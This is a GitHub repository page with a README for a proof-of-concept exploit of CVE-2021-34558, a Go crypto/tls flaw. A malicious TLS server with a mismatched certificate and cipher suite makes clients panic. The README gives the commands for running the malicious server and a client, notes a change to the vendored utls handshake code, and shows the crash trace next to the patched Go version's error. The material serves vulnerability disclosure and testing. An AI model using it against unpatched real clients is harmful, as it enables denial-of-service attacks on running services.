https://github.com/alexzorin/cve-2021-34558

https://github.com/alexzorin/cve-2021-34558

Last synced: 7 days ago
JSON representation

• Host: GitHub
• URL: https://github.com/alexzorin/cve-2021-34558
• Owner: alexzorin
• Created: 2021-07-13T06:15:21.000Z (over 3 years ago)
• Default Branch: master
• Last Pushed: 2021-07-13T06:16:11.000Z (over 3 years ago)
• Last Synced: 2024-10-19T18:12:33.375Z (15 days ago)
• Language: Go
• Size: 252 KB
• Stars: 47
• Watchers: 4
• Forks: 4
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

• awesome-hacking-lists - alexzorin/cve-2021-34558 - (Go)

README

        
# POC for CVE-2021-34558

```bash

# Run the malicious TLS server

go run main.go -mode server 

# Run a normal `http.Get` client call against the server which panics

go run main.go -mode client

```

There is a minor modification to `./vendor/github.com/refraction-networking/utls/handshake_server.go` to enable the malicious handshake to be sent with a mismatching certificate/cipher.

It looks like this:

    $ go run main.go -mode client

    panic: interface conversion: interface {} is *ecdsa.PublicKey, not *rsa.PublicKey

    goroutine 7 [running]:

    crypto/tls.rsaKeyAgreement.generateClientKeyExchange(0xc000001c80, 0xc00014a000, 0xc000130580, 0x0, 0x0, 0x4, 0x6e9da0, 0x7fe73e42e201, 0xc00001c758)

            /usr/local/go/src/crypto/tls/key_agreement.go:70 +0x3a6

    crypto/tls.(*clientHandshakeState).doFullHandshake(0xc00015fd48, 0xc00001a380, 0x31)

            /usr/local/go/src/crypto/tls/handshake_client.go:574 +0x5e9

    crypto/tls.(*clientHandshakeState).handshake(0xc00015fd48, 0xc00001c418, 0x4)

            /usr/local/go/src/crypto/tls/handshake_client.go:421 +0x566

    crypto/tls.(*Conn).clientHandshake(0xc00007f180, 0x0, 0x0)

            /usr/local/go/src/crypto/tls/handshake_client.go:220 +0x754

    crypto/tls.(*Conn).Handshake(0xc00007f180, 0x0, 0x0)

            /usr/local/go/src/crypto/tls/conn.go:1391 +0xc9

    net/http.(*persistConn).addTLS.func2(0x0, 0xc00007f180, 0x0, 0xc0000624e0)

            /usr/local/go/src/net/http/transport.go:1530 +0x45

    created by net/http.(*persistConn).addTLS

            /usr/local/go/src/net/http/transport.go:1526 +0x1f6

    exit status 2

A patched version of Go (1.16.6+) does not crash:

    $ go run main.go -mode client

    2021/07/13 06:13:50  Get "https://127.0.0.1:8443/": tls: server certificate contains incorrect key type for selected ciphersuite